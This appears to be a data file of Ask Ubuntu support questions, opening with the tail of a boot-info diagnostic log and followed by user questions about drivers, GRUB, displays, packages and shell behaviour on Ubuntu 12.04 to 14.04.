512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 1,953,525,167 1,953,525,167 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 1,026,047 1,024,000 efi system partition /dev/sda2 1,026,048 1,107,967 81,920 - /dev/sda3 1,107,968 1,370,111 262,144 microsoft reserved partition ( windows ) /dev/sda4 1,370,112 2,394,111 1,024,000 windows recovery environment ( windows ) /dev/sda5 2,394,112 1,487,544,319 1,485,150,208 data partition ( windows/linux ) /dev/sda6 1,927,456,768 1,928,173,567 716,800 windows recovery environment ( windows ) /dev/sda7 1,928,173,568 1,953,518,598 25,345,031 windows recovery environment ( windows ) drive : sdb _______________________________________ disk /dev/sdb : 32.0 gb , 32017047552 bytes 256 heads , 63 sectors/track , 3877 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 1 4,294,967,295 4,294,967,295 ee gpt /dev/sdb1 ends after the last sector of /dev/sdb guid partition table detected . partition start sector end sector # of sectors system /dev/sdb1 2,048 16,775,167 16,773,120 - drive : sdc _______________________________________ disk /dev/sdc : 2051 mb , 2051014656 bytes 33 heads , 63 sectors/track , 1926 cylinders , total 4005888 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdc1 * 32 4,005,887 4,005,856 b w95 fat32 drive : isw_bdfhjajgjj_wx11a82y0834 _______________________________________ disk /dev/mapper/isw_bdfhjajgjj_wx11a82y0834 : 1000.2 gb , 1000201650176 bytes 255 heads , 63 sectors/track , 121600 cylinders , total 1953518848 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/mapper/isw_bdfhjajgjj_wx11a82y08341 1 1,953,525,167 1,953,525,167 ee gpt /dev/mapper/isw_bdfhjajgjj_wx11a82y08341 ends after the last sector of /dev/mapper/isw_bdfhjajgjj_wx11a82y0834 guid partition table detected . partition start sector end sector # of sectors system /dev/mapper/isw_bdfhjajgjj_wx11a82y08341 2,048 1,026,047 1,024,000 efi system partition /dev/mapper/isw_bdfhjajgjj_wx11a82y08342 1,026,048 1,107,967 81,920 - /dev/mapper/isw_bdfhjajgjj_wx11a82y08343 1,107,968 1,370,111 262,144 microsoft reserved partition ( windows ) /dev/mapper/isw_bdfhjajgjj_wx11a82y08344 1,370,112 2,394,111 1,024,000 windows recovery environment ( windows ) /dev/mapper/isw_bdfhjajgjj_wx11a82y08345 2,394,112 1,487,544,319 1,485,150,208 data partition ( windows/linux ) /dev/mapper/isw_bdfhjajgjj_wx11a82y08346 1,927,456,768 1,928,173,567 716,800 windows recovery environment ( windows ) /dev/mapper/isw_bdfhjajgjj_wx11a82y08347 1,928,173,568 1,953,518,598 25,345,031 windows recovery environment ( windows ) drive : isw_dhhceichda_volume_0000 _______________________________________ disk /dev/mapper/isw_dhhceichda_volume_0000 : 12.0 gb , 12045123584 bytes 256 heads , 63 sectors/track , 1458 cylinders , total 23525632 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/mapper/isw_dhhceichda_volume_00001 1 4,294,967,295 4,294,967,295 ee gpt /dev/mapper/isw_dhhceichda_volume_00001 ends after the last sector of /dev/mapper/isw_dhhceichda_volume_0000 guid partition table detected . partition start sector end sector # of sectors system /dev/mapper/isw_dhhceichda_volume_00001 2,048 16,775,167 16,773,120 - '' blkid '' output : ____________________________________ device uuid type label /dev/loop0 squashfs /dev/mapper/isw_bdfhjajgjj_wx11a82y0834p1 faf0-2794 vfat esp /dev/mapper/isw_bdfhjajgjj_wx11a82y0834p2 4052-9373 vfat diags /dev/mapper/isw_bdfhjajgjj_wx11a82y0834p4 d81c53fa1c53d1dc ntfs winretools /dev/mapper/isw_bdfhjajgjj_wx11a82y0834p5 bc0e58fa0e58aee0 ntfs os /dev/mapper/isw_bdfhjajgjj_wx11a82y0834p6 c02a3af62a3ae8d4 ntfs /dev/mapper/isw_bdfhjajgjj_wx11a82y0834p7 ca1ee7511ee7355b ntfs pbr image /dev/sda1 faf0-2794 vfat esp /dev/sda2 4052-9373 vfat diags /dev/sda4 d81c53fa1c53d1dc ntfs winretools /dev/sda5 bc0e58fa0e58aee0 ntfs os /dev/sda6 c02a3af62a3ae8d4 ntfs /dev/sda7 ca1ee7511ee7355b ntfs pbr image /dev/sdc1 c44b-bc13 vfat uui ========================= `` ls -r /dev/mapper/ '' output : ========================= /dev/mapper : control isw_bdfhjajgjj_wx11a82y0834 isw_bdfhjajgjj_wx11a82y0834p1 isw_bdfhjajgjj_wx11a82y0834p2 isw_bdfhjajgjj_wx11a82y0834p3 isw_bdfhjajgjj_wx11a82y0834p4 isw_bdfhjajgjj_wx11a82y0834p5 isw_bdfhjajgjj_wx11a82y0834p6 isw_bdfhjajgjj_wx11a82y0834p7 isw_dhhceichda_volume_0000 isw_dhhceichda_volume_0000p1 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sdc1 /cdrom vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) =========================== sdc1/boot/grub/grub.cfg : =========================== if loadfont /boot/grub/font.pf2 ; then set gfxmode=auto insmod efi_gop insmod efi_uga insmod gfxterm terminal_output gfxterm fi set menu_color_normal=white/black set menu_color_highlight=black/light-gray menuentry `` try ubuntu without installing '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed cdrom-detect/try-usb=true noprompt floppy.allowed_drive_mask=0 ignore_uuid boot=casper quiet splash -- initrd /casper/initrd.lz } menuentry `` install ubuntu '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed cdrom-detect/try-usb=true noprompt floppy.allowed_drive_mask=0 ignore_uuid boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz } menuentry `` oem install ( for manufacturers ) '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed cdrom-detect/try-usb=true noprompt floppy.allowed_drive_mask=0 ignore_uuid boot=casper only-ubiquity quiet splash oem-config/enable=true -- initrd /casper/initrd.lz } menuentry `` check disc for defects '' { set gfxpayload=keep linux /casper/vmlinuz.efi cdrom-detect/try-usb=true noprompt floppy.allowed_drive_mask=0 ignore_uuid boot=casper integrity-check quiet splash -- initrd /casper/initrd.lz } =================== sdc1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown gpt partiton type d3ad6b79bf6b9f4db631466eb71a4965 unknown gpt partiton type dee2bfd3af3ddf11ba40e3a556d89593 unknown gpt partiton type d3ad6b79bf6b9f4db631466eb71a4965 unknown gpt partiton type dee2bfd3af3ddf11ba40e3a556d89593 unknown bootloader on sda1 00000000 eb 58 90 4d 53 44 4f 53 35 2e 30 00 02 08 3e 18 |.x.msdos5.0 ... > .| 00000010 02 00 00 00 00 f8 00 00 3f 00 ff 00 00 08 00 00 | ... ... .. ? ... ... .| 00000020 00 a0 0f 00 e1 03 00 00 00 00 00 00 02 00 00 00 | ... ... ... ... ... .| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 80 00 29 94 27 f0 fa 4e 4f 20 4e 41 4d 45 20 20 |.. ) . '..no name | 00000050 20 20 46 41 54 33 32 20 20 20 33 c9 8e d1 bc f4 | fat32 3 ... ..| 00000060 7b 8e c1 8e d9 bd 00 7c 88 56 40 88 4e 02 8a 56 | { ... ... |.v @ .n..v| 00000070 40 b4 41 bb aa 55 cd 13 72 10 81 fb 55 aa 75 0a | @ .a..u..r ... u.u.| 00000080 f6 c1 01 74 05 fe 46 02 eb 2d 8a 56 40 b4 08 cd | ... t..f..-.v @ ... | 00000090 13 73 05 b9 ff ff 8a f1 66 0f b6 c6 40 66 0f b6 |.s ... ... f ... @ f..| 000000a0 d1 80 e2 3f f7 e2 86 cd c0 ed 06 41 66 0f b7 c9 | ... ? ... ... .af ... | 000000b0 66 f7 e1 66 89 46 f8 83 7e 16 00 75 39 83 7e 2a |f..f.f..~..u9.~*| 000000c0 00 77 33 66 8b 46 1c 66 83 c0 0c bb 00 80 b9 01 |.w3f.f.f ... ... ..| 000000d0 00 e8 2c 00 e9 a8 03 a1 f8 7d 80 c4 7c 8b f0 ac |.. , ... ... } ..| ... | 000000e0 84 c0 74 17 3c ff 74 09 b4 0e bb 07 00 cd 10 eb |..t. < .t ... ... ... | 000000f0 ee a1 fa 7d eb e4 a1 7d 80 eb df 98 cd 16 cd 19 | ... } ... } ... ... ..| 00000100 66 60 80 7e 02 00 0f 84 20 00 66 6a 00 66 50 06 |f`.~ ... . .fj.fp.| 00000110 53 66 68 10 00 01 00 b4 42 8a 56 40 8b f4 cd 13 |sfh ... ..b.v @ ... .| 00000120 66 58 66 58 66 58 66 58 eb 33 66 3b 46 f8 72 03 |fxfxfxfx.3f ; f.r.| 00000130 f9 eb 2a 66 33 d2 66 0f b7 4e 18 66 f7 f1 fe c2 |..*f3.f..n.f ... .| 00000140 8a ca 66 8b d0 66 c1 ea 10 f7 76 1a 86 d6 8a 56 |..f..f ... .v ... .v| 00000150 40 8a e8 c0 e4 06 0a cc b8 01 02 cd 13 66 61 0f | @ ... ... ... ... fa.| 00000160 82 74 ff 81 c3 00 02 66 40 49 75 94 c3 42 4f 4f |.t ... ..f @ iu..boo| 00000170 54 4d 47 52 20 20 20 20 00 00 00 00 00 00 00 00 |tmgr ... ... ..| 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 44 69 | ... ... ... ... ..di| 000001b0 73 6b 20 65 72 72 6f 72 ff 0d 0a 50 72 65 73 73 |sk error ... press| 000001c0 20 61 6e 79 20 6b 65 79 20 74 6f 20 72 65 73 74 | any key to rest| 000001d0 61 72 74 0d 0a 00 00 00 00 00 00 00 00 00 00 00 |art ... ... ... ... .| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 ac 01 b9 01 00 00 55 aa | ... ... ... ... ..u.| 00000200 unknown bootloader on sda2 00000000 eb 58 90 4d 53 44 4f 53 35 2e 30 00 02 01 7e 1b |.x.msdos5.0 ... ~.| 00000010 02 00 00 00 00 f8 00 00 3f 00 ff 00 00 a8 0f 00 | ... ... .. ? ... ... .| 00000020 00 40 01 00 41 02 00 00 00 00 00 00 02 00 00 00 | . @ ..a ... ... ... ..| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 80 00 29 73 93 52 40 4e 4f 20 4e 41 4d 45 20 20 |.. ) s.r @ no name | 00000050 20 20 46 41 54 33 32 20 20 20 33 c9 8e d1 bc f4 | fat32 3 ... ..| 00000060 7b 8e c1 8e d9 bd 00 7c 88 56 40 88 4e 02 8a 56 | { ... ... |.v @ .n..v| 00000070 40 b4 41 bb aa 55 cd 13 72 10 81 fb 55 aa 75 0a | @ .a..u..r ... u.u.| 00000080 f6 c1 01 74 05 fe 46 02 eb 2d 8a 56 40 b4 08 cd | ... t..f..-.v @ ... | 00000090 13 73 05 b9 ff ff 8a f1 66 0f b6 c6 40 66 0f b6 |.s ... ... f ... @ f..| 000000a0 d1 80 e2 3f f7 e2 86 cd c0 ed 06 41 66 0f b7 c9 | ... ? ... ... .af ... | 000000b0 66 f7 e1 66 89 46 f8 83 7e 16 00 75 39 83 7e 2a |f..f.f..~..u9.~*| 000000c0 00 77 33 66 8b 46 1c 66 83 c0 0c bb 00 80 b9 01 |.w3f.f.f ... ... ..| 000000d0 00 e8 2c 00 e9 a8 03 a1 f8 7d 80 c4 7c 8b f0 ac |.. , ... ... } ..| ... | 000000e0 84 c0 74 17 3c ff 74 09 b4 0e bb 07 00 cd 10 eb |..t. < .t ... ... ... | 000000f0 ee a1 fa 7d eb e4 a1 7d 80 eb df 98 cd 16 cd 19 | ... } ... } ... ... ..| 00000100 66 60 80 7e 02 00 0f 84 20 00 66 6a 00 66 50 06 |f`.~ ... . .fj.fp.| 00000110 53 66 68 10 00 01 00 b4 42 8a 56 40 8b f4 cd 13 |sfh ... ..b.v @ ... .| 00000120 66 58 66 58 66 58 66 58 eb 33 66 3b 46 f8 72 03 |fxfxfxfx.3f ; f.r.| 00000130 f9 eb 2a 66 33 d2 66 0f b7 4e 18 66 f7 f1 fe c2 |..*f3.f..n.f ... .| 00000140 8a ca 66 8b d0 66 c1 ea 10 f7 76 1a 86 d6 8a 56 |..f..f ... .v ... .v| 00000150 40 8a e8 c0 e4 06 0a cc b8 01 02 cd 13 66 61 0f | @ ... ... ... ... fa.| 00000160 82 74 ff 81 c3 00 02 66 40 49 75 94 c3 42 4f 4f |.t ... ..f @ iu..boo| 00000170 54 4d 47 52 20 20 20 20 00 00 00 00 00 00 00 00 |tmgr ... ... ..| 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 44 69 | ... ... ... ... ..di| 000001b0 73 6b 20 65 72 72 6f 72 ff 0d 0a 50 72 65 73 73 |sk error ... press| 000001c0 20 61 6e 79 20 6b 65 79 20 74 6f 20 72 65 73 74 | any key to rest| 000001d0 61 72 74 0d 0a 00 00 00 00 00 00 00 00 00 00 00 |art ... ... ... ... .| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 ac 01 b9 01 00 00 55 aa | ... ... ... ... ..u.| 00000200 unknown bootloader on isw_bdfhjajgjj_wx11a82y08341 unknown bootloader on isw_bdfhjajgjj_wx11a82y08342 unknown bootloader on isw_bdfhjajgjj_wx11a82y08343 unknown bootloader on isw_bdfhjajgjj_wx11a82y08344 unknown bootloader on isw_bdfhjajgjj_wx11a82y08345 unknown bootloader on isw_bdfhjajgjj_wx11a82y08346 unknown bootloader on isw_bdfhjajgjj_wx11a82y08347 unknown bootloader on isw_dhhceichda_volume_00001 ========= devices which do n't seem to have a corresponding hard drive : ========= sdd =============================== stderr messages : =============================== /home/ubuntu/desktop/bootinfoscript : line 1646 : [ : 2.73495e+09 : integer expression expected cat : /tmp/bootinfo-4vxegypn/tmp_log : no such file or directory hexdump : /dev/mapper/isw_bdfhjajgjj_wx11a82y08341 : no such file or directory hexdump : /dev/mapper/isw_bdfhjajgjj_wx11a82y08341 : no such file or directory hexdump : /dev/mapper/isw_bdfhjajgjj_wx11a82y08342 : no such file or directory hexdump : /dev/mapper/isw_bdfhjajgjj_wx11a82y08342 : no such file or directory
432926	updated 12.04 to 12.10 and now screen remains black	i updated my laptop to 12.10 and did everything it recomended and now when i start up it remains black after ubuntu logo flashes
432927	surface pro 2 keyobard cover not working in ubuntu	i 'm trying to install ubuntu 12.04 on my surface pro 2 at the moment and it seems to be working fine , exept for the fact , that neither one of my keyboard covers is working , the keys light up on my type cover 2 , but nothing registers and the same is true for me old touch cover ! i 'm thously unable to complete the installation , can not enter a username and so on ... have anyone of you encountered this or a similar problem and knows a solution ? thanks from austria ! : ) p.s . : i used this guide : dual boot surface pro with ubuntu ?
432928	nautilus crashes , no desktop icons	i need your help , when i launch nautilus it crashes in 2 secons + desktop icons are n't displayed . i tried to uninstall python-nautilus but it does n't work for me + do n't have any zero byte file . using terminal : unauthorized access to memory sigsegv thank you : )
432930	file counts not adding up : finding files ls -a misses	filelight alleges that i have 112,028 files in my home directory , on the first level ( not recursing ) . but : ls -1a ~ | wc -l thinks i have 225. find ~ -maxdepth 1 | wc -l says 224 . the difference comes from ls 's totals header . where did the other 111,804 files come from ? so to search further , i found the recursive totals , but i found they were pretty close , within 111k . find ~ | wc -l : 572,152 filelight : 569,320 originally i thought so many unaccounted for files might indicate a rootkit , but chkrootkit only finds suckit , which is only on account of a bug . how might i find these mysterious files ? do they really exist ?
432932	nfs export and dynamic ip	currently i have a pxe hosted from a xubuntu 12.04 box , using dnsmasq as a dns proxy with tftpd to host pxe boot files , along with nfs share for the booting file system . i would like to set the servers ip to be dynamic and not require me to change the boot menu files for the new ip address . so in my pxelinux.cfg folder i have the default menu.c32 menu file with the following in it : append boot=casper netboot=nfs nfsroot=192.168.1.1 : /srv/tftpboot/boot initrd=boot/casper/initrd.lz is there a way to use a global or local variable to set the ip ? so something like this would be ideal append boot=casper netboot=nfs nfsroot= $ ( serverip ) : /srv/tftpboot/boot initrd=boot/casper/initrd.lz
432933	linux ( ubuntu 12.04 ) driver for broadcom corp bcm 4352 wireless network adapter	i 've recently purchased a dell alienware 17 laptop and i 've installed ubuntu 12.04 lts ( kernel = 3.11.0-15 ) on it . the problem is that the wireless card ( broadcom corporation bcm4352 802.11ac wireless network adapter ( rev 03 ) ) does n't work in my linux installation . i see that the drivers dell offers on its website ( http : //www.dell.com/support/drivers/us/en/19/driverdetails ? driverid=w49dt ) are all for windows . broadcom 's linux drivers ( http : //www.broadcom.com/support/802.11/linux_sta.php ) are only for the bcm4311- , bcm4312- , bcm4313- , bcm4321- , bcm4322- , bcm43224- , and bcm43225- , bcm43227- and bcm43228-based hardware ( and not for the bcm4352 hardware that i have ) and supported till kernel 3.8.x ( mine is 3.11.0.15 ) . i notice that dell now sells alienware machines with ubuntu 12.04 lts on them and must have a driver for this card . where can i access that and how do i go about installing it ?
432935	dash wont open at all . 12.04	when i click on the dash it does nothing . everything else on the dock works and opens just fine . keyboard shortcuts all work except to open the dash . this just started , everything worked fine 30min ago . i havent changed a single setting or anything it just up and stopped opening .
432937	is there instruction counter at kernel level	is there any kernel data structure / counter which stores the number of instructions executed after os boot up till now ?
432938	new user ... when my backup software starts it tells me to sign in to ubuntu one	i do have an active ubuntu one account . when i click the sign in button nothing happens . did i do something wrong ?
432939	tried to edit partitions now it says `` invalid partition table ''	i just wanted to free up disk space and i think i deleted a partition and now i do n't know what to do ... i was using ubuntu .
432941	windows 8 missing from grub menu	i have windows 8 preinstalled on my laptop . initially i installed ubuntu 12 lts but i coudnt boot it with uefi enabled , on using boot-repair it told me that this version of ubuntu is not supported by efi . so i installed ubuntu-13.10-desktop-amd64 and during the setup choose the option remove ubuntu 12 lts and install ubuntu 13 . after the installation ubuntu starts but there is no windows entry in grub , so i ran boot repair from the live cd again but still it did not show windows 8 . this is the url it generated : paste.ubuntu.com/7076240 then i ran boot-repair from ubuntu and it finished with this url : paste.ubuntu.com/7076405 now there is one more entry in grub but none of them open windows 8 . also i am unable to mount the windows partiton to reach my files . i tried the method said in one of the forums where you update the grub manually to point to windows efi file but i coudnt find the ( hdo , gptx ) x number recquired to do it . any help would be appreciated . thank you .
432943	dropbox 1.6.1 does n't link to account	for the life of me , i ca n't seem to get dropbox installed in such a way that it links to my account and starts syncing files . i 've tried the following : sudo apt-get install dropbox sudo apt-get install nautilus-dropbox install from ( 1 ) .deb ( 2 ) cli per https : //www.dropbox.com/install ? os=linux installing from dropbox repo per this answer a couple of these methods had me running ~/.dropbox-dist/dropboxd . i was expecting to see the url to link the account at some point , but every time i ran this command , there was no output , although the icon would pop up . when i click the dropbox icon , it just says `` connecting ... '' even though it never queries me for credentials . i even tried installing using ubuntu-tweak to see if that would work . i got a dependency error with that , so i could n't really find out .
432944	remove lines with less than 4 characters and more than 3 numbers in bash	so for example , i have this text file : use user_99 12345 +10k lines ... and i want to remove those that have less than 4 characters from the command line , i 've already searched in google but no results came . any ideas ? : ) i 'd also like to remove lines with more than 3 numbers in the beginning .
432947	ubuntu wireless on lenovo 9s does not work with linksys driver or network	will not detect or connect to ubuntu on my netbook . worked when xp was installed i am using a lenovo 9s netbook . how can i and where can i get the drivers for my lenovo to work with the linksys e1200 and network adapter m600
432950	check marks and box are gone ?	usually in some video games , eg left 4 dead 2 , garry 's mod , and team fortress 2 , the places where check boxes usually are , are replaced with a single letter ; usually t or l. how can i get them to show up ? i 'm running ubuntu 13.10 .
432951	ca n't restore 12.04 from image after editing a tightvnc startup script	i 'm running ubuntu 12.04 on my computer , setting it up to become a media server . hardware : intel xeon processor , ubuntu is on a 64gb ssd , with two 3tb hard drives in the other hd bays and 4gb of memory . the image file i refer to later is of the 64gb ssd . i installed tightvnc server and connected to it from another computer , but unity did n't display ( i got just the desktop with no launcher ) . i followed this guide : http : //confoundedtech.blogspot.com/2012/12/fix-tightvncserver-not-showing-unity.html and copy/pasted the following into my xstartup file : # ! /bin/sh # vnc server ( virtual-mode ) start-up script compatible with ubuntu 12.04 [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & # if [ -f /usr/bin/gnome-session ] ; then # some gnome session types wo n't work with xvnc , try to pick a sensible # default . for session in `` ubuntu-2d '' `` 2d-gnome '' ; do if [ -f /usr/share/gnome-session/sessions/ $ session.session ] ; then desktop_session= $ session ; export desktop_session gdmsession= $ session ; export gdmsession startup= '' /usr/bin/gnome-session -- session= $ session '' ; export startup fi done fi if [ -x /etc/x11/xsession ] ; then /etc/x11/xsession elif [ -x /etc/x11/xdm/xsession ] ; then /etc/x11/xdm/xsession elif [ -x /etc/x11/xinit/xsession ] ; then /etc/x11/xinit/xsession elif [ -x /etc/gdm/xsession ] ; then /etc/gdm/xsession gnome-session elif [ -x /etc/kde/kdm/xsession ] ; then /etc/kde/kdm/xsession elif [ -x /usr/dt/bin/xsession ] ; then xstation=1 dtxserverlocation=local /usr/dt/bin/xsession elif [ -x /usr/dt/bin/dtsession ] ; then /usr/dt/bin/dtsession else if which twm > /dev/null 2 > & 1 ; then xterm -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & twm else xterm -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' fi fi vncserver -kill $ display i then restarted the computer , but it would n't boot up . normally it skips grub , but this time it loaded the grub screen . when i try to boot ubuntu , the screen turns purple but the ubuntu logo never appears and it does n't load . when i try to boot ubuntu recovery mode , the screen turns black and it still does n't load . troubleshooting steps : i booted ubuntu from a flash drive , did n't install , and navigated to the hard drive where the broken operating system was installed . from terminal , i found the .vnc folder , but was n't able to get in to edit the xstartup file ( permission denied , obviously ) . i used : rm -rf .vnc to remove the directory and all the files , shut down the computer , unplugged the flash drive and tried to boot again . i got the same issue as before ( purple screen , no ubuntu loading logo ) . i have a image file of the hard drive ( from before i ever installed tightvnc ) . after failing to repair the installation from the ubuntu flash drive , i decided to restore the computer from my image . using clonezilla , i did just that , and it booted up ! problem solved , right ? wrong . the computer ran perfectly all day , i had to restart for some reason and boom . it turned into a brick again , refusing to boot up . ( same purple screen , black recovery mode screen problem ) . ok , now i 'm stumped . i restore the image file again , but this time it did n't even boot up once before bricking . i 'm still getting the infuriating purple screen , and it loads grub when it starts up ( which it should n't ) i 've invested a ton of time into this system , i need to get it running again ! all help is greatly appreciated .
432952	how to install mods for skyrim on playonlinux ?	i was successful last night running playonlinux and installing steam and accessing my game account with my already purchased skyrim game . i am almost finished installing skyrim . i am do not know how to incorporate mods to the game from playonlinux and i am worried that that will be a very difficult task to complete . how does one install mods for skyrim on playonlinux ?
432956	nvidia multiple monitor with different resolution	i have 2 monitor that have different resolution which is 1440x900 and 1360x768 . but the default settings for my 1360x768 monitor in nvidia-settings is 1024x768 and when i tried to change it to 1360x768 the screen is off the monitor or its out of it margin . here 's my xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.38 ( buildd @ fermium ) tue jan 14 12:07:21 utc 2014 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 331.49 ( buildmeister @ swio-display-x86-rhel47-10 ) wed feb 12 21:00:07 pst 2014 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : builtin , vertrefresh source : builtin identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-0 '' horizsync 28.0 - 55.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 630 '' endsection section `` screen '' # removed option `` metamodes '' `` dvi-i-0 : 1440x900 +0+0 , vga-0 : nvidia-auto-select +1440+0 '' # removed option `` nvidiaxineramainfoorder '' `` crt-0 '' # removed option `` metamodes '' `` dvi-i-0 : 1360x768 +1440+0 , vga-0 : 1440x900 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 # option `` twinview '' `` 1 '' # option `` twinviewxineramainfoorder '' `` crt-0 '' option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` crt-1 '' option `` metamodes '' `` dvi-i-0 : 1360x768 +1440+0 , vga-0 : 1440x900 +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 modes `` 1440x900 '' `` 1360x768 '' virtual 2800 900 endsubsection endsection
432957	alt-gr key is not working in ubuntu 13.10	i installed ubuntu with mostly default configuration ; the keyboard seems not to detect the alt-gr key so that i can not type international characters . how can i enable alt-gr key ?
432961	14.04 : after a recent update , bash completion is broken in specific cases	after some unspecified point in the past , my bash completion has acted strangely : if i begin a filename to complete with ~/ , i can not complete filenames , only directory names , and the suggested names ( if i press tab twice ) show only directories ( including hidden ones ) sometimes , under random circumstances , completing relative paths also has the above restrictions ( most recently , trying to complete while in a subdirectory of /tmp exhibited this behavior ) if i start a command line as var= -l ( space ) for any var and -l and press tab , bash-complete throws up its `` unknown argument/incorrect syntax '' help message ( in my case , i wanted to tab-complete an ldflags=-l/ ... whose spaces would be removed once i found the directory that had the libraries ) everything else ( completing absolute pathnames , command completion , etc . ) works as expected . i do not have the /dir ( space ) tab-completion behavior that other questions about bash-complete found here and on google cover . i tried removing /etc/bash_completion.d to no avail . sudo apt-get -- reinstall install bash-complete did not work either . complete -r restores the intended behavior , so it is an issue with bash_completion ... this has persisted across several updates to the bash-completion package as well . i am on kubuntu 14.04 ; this happens both in konsole and in virtual terminals . what could be going on ? thanks !
432962	ca n't access logical partition immediately	bit of a newbie question : i have a logical partition called `` workspace '' ( i am only running one hard drive ) . the logical partition contains media files for use from multiple operating systems ( dual boot ) . i have it mapped as /media/mark/workspace and it appears in nautilus . i can click on it to browse it . it does n't appear to actually mount until i click on it in nautilus . recently i moved my thunderbird profile to 'workspace ' and now before i can run thunderbird , i have to open nautilus and view that drive before thunderbird will run ( otherwise thunderbird says `` ca n't find profile '' ) . so i 'm assuming that for some reason the partition is n't actually mounting until i manually access it . can someone please tell me how to make it mount immediately on boot ?
432964	identify udev subsystems and devtypes	i have to write a python script to monitor for usb mass storage devices . to successfully filter the required media it must be identified by its subsystem and devtype . does anyone know the required subsystem and devtype for a usb mass storage device ? alternatively , can anyone tell me where i could find a list of all subsystems and devtypes ?
432969	will not allow me to install playonlinux ! says i have 'held broken packages	when i try to download 'playonlinux ' i get : the following packages have unmet dependencies : playonlinux : depends : icoutils but it is not installable depends : curl but it is not installable e : unable to correct problems , you have held broken packages . and i also ca n't install literally anything else .
432972	how do i remove pokemon online ?	i was told to try sudo apt-get remove pokemon-online-client but it says command not found : pokemon-online-client . what should i do to remove it ?
432983	bizarre display issues	i 've been running a dual display setup with two cheap monitors for the past couple of weeks . everything worked fine , at first . nvidia-settings recognized both displays perfectly , and setup was straightforward . the first monitor is an acer-p191w , and the secondary is a hanns-g hw173d . today , i stupidly unplugged the hanns-g from the wall without completely disabling it in ubuntu first . after doing so , my acer stopped working as well . now , my system only ever recognizes the hanns-g. my gpu ( 9800gtx ) has two dvi ports , dvi-1-2 and dvi-1-3 . regardless of which one the monitors are plugged into , the hanns is the only one that works - my acer is n't even detected at all . if i boot to the login screen with the hanns-g , unplug it , and then plug the acer into that same port , it is semi-detected , but it immediately loses signal again after i attempt to login . when i switch from nvidia 's drivers to nouveou , however , i 'm able to log in fine , and it only loses signal upon restarting . now i switched out the dvi cable on my acer with a vga cable + vga to dvi adapter , and it 's perfectly detected as dvi-1-1 . unfortunately the hanns-g is n't recognized with this setup . it 's a somewhat functional workaround for now , but i really want to get my system functioning the way it was before , so any help would be much appreciated . thanks in advance ! edit : with both monitors plugged in , when i remove the asus + adapter , the hanns starts to display again , and vice versa . : /
432984	why virtual console ( ctrl+alt+f1 ) asked for password after logged into it ?	i want to run sudo service lightdm restart command on virtual console , so i pressed ctrl+alt+f1 after that vc login prompt appears , login : password : i logged into the vc with my login credentials.if i run sudo service lightdm restart command on that prompt , it again asked for sudo password . ~ $ sudo service lightdm restart [ sudo ] password for avinash : why there is a two step verfication proces ?
432990	problem with changing login screen	i tried several time to change my log in screen by using sudo dpkg-reconfigure lightdm . i choose lightdm from here . but my log in screen is unchanged and look like below . how can i change this and back to my default unity log in screen ? ?
